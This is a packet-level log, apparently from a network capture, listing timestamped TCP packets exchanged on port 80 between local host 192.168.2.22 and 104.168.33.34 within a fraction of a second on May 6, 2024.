May 6, 2024 14:59:20.523586988 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523601055 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523613930 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523614883 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523627043 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523628950 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523639917 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523643970 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523654938 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523669004 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523670912 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523680925 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523698092 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523701906 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523714066 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523736954 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523751020 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523940086 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.523952961 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523978949 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.523998022 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524013042 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524043083 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524055958 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524069071 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524082899 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524085999 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524113894 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524121046 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524126053 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524167061 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524202108 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524215937 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524231911 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524241924 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524245024 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524255991 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524260044 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524270058 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524276972 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524283886 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524291992 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524297953 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524308920 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524312019 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524327993 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524342060 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524378061 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524393082 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524408102 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524418116 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524420977 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524431944 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524435043 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.524445057 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524458885 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.524470091 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.525062084 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.525094032 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.525100946 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.525131941 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.528115988 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.673073053 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673098087 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673109055 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673121929 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673135042 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673149109 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673181057 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673192978 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673206091 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673218012 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673230886 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673243999 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673255920 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673266888 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673310995 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673324108 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673335075 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673346996 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673357964 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673366070 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.673366070 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.673366070 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.673374891 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673387051 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673393011 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673403978 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.673403978 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673446894 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.673449039 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673460007 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673466921 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673477888 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673523903 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.673537016 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673548937 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673554897 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673563957 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673577070 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673588991 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673600912 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673614025 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.673635006 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673648119 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.673665047 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.673677921 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675630093 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675674915 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675688028 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675688028 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675702095 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675709009 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675714016 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675725937 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675728083 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675739050 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675740957 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675754070 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675754070 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675760984 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675772905 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675786972 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675795078 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675798893 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675806046 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675806999 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675817966 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675828934 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675829887 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675843000 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675844908 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675854921 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675858021 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675865889 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675880909 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675889015 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675894022 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675899982 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675909996 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675923109 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675932884 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675935984 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675942898 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675949097 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675956964 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675960064 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675967932 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.675988913 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.675988913 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676002026 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676013947 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676026106 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676026106 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676033974 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676048994 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676063061 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676069021 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676084995 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676106930 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676114082 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676120996 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676121950 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676132917 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676142931 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676151991 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676153898 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676166058 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676171064 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676172972 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676183939 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676198006 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676199913 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676211119 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676218033 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676223993 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676233053 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676237106 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676245928 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676259041 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676275969 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676278114 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676290035 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676296949 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676309109 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676321983 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676328897 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676333904 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676345110 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676346064 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676358938 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676359892 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676368952 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676373005 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676383972 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676387072 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676398993 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676402092 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676425934 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676435947 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676455021 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676466942 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676482916 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676493883 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676496029 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676501989 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676510096 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676517010 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676522970 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676534891 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676537037 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676541090 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676553011 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676565886 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676572084 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676579952 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676587105 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676588058 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676608086 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676619053 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676636934 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676649094 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676673889 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676683903 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676696062 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676733017 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676918983 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676932096 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676938057 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676949024 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676963091 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676973104 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676975965 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676987886 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.676990986 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.676997900 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677006006 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677014112 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677025080 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677054882 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677062035 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677068949 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677081108 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677103996 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677112103 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677118063 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677129984 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677135944 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677144051 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677155018 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677155972 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677167892 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677181959 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677181959 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677181959 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677190065 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677195072 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677202940 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677207947 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677213907 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677221060 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677228928 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677233934 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677242994 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677246094 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677256107 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677259922 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677274942 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677287102 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677287102 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677289963 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677295923 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677309990 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677324057 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677786112 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677812099 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677826881 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677834034 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677841902 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677846909 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677855968 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677864075 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677870989 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677877903 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677892923 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677900076 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677932978 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677946091 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677958012 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677970886 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677977085 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677985907 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.677994013 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.677999973 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678009033 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678014994 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678014994 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678030014 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678033113 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678050995 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678064108 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678087950 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678101063 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678113937 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678124905 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678127050 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678138971 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678139925 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678152084 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678153038 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678164959 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678167105 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678179026 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678183079 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678194046 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678195953 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678206921 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678210020 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678220034 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678222895 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678232908 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678236008 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678246021 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678251982 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678260088 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678272963 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678277016 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678278923 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678317070 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678353071 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678386927 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678395033 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678407907 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678421021 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678437948 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678452969 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678472042 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678486109 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678492069 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678503990 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678524971 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678539038 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678584099 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678596973 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678610086 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678621054 CEST	49172	80	192.168.2.22	104.168.33.34
May 6, 2024 14:59:20.678622961 CEST	80	49172	104.168.33.34	192.168.2.22
May 6, 2024 14:59:20.678636074 CEST	80	49172	104.168.33.34	192.168.2.22
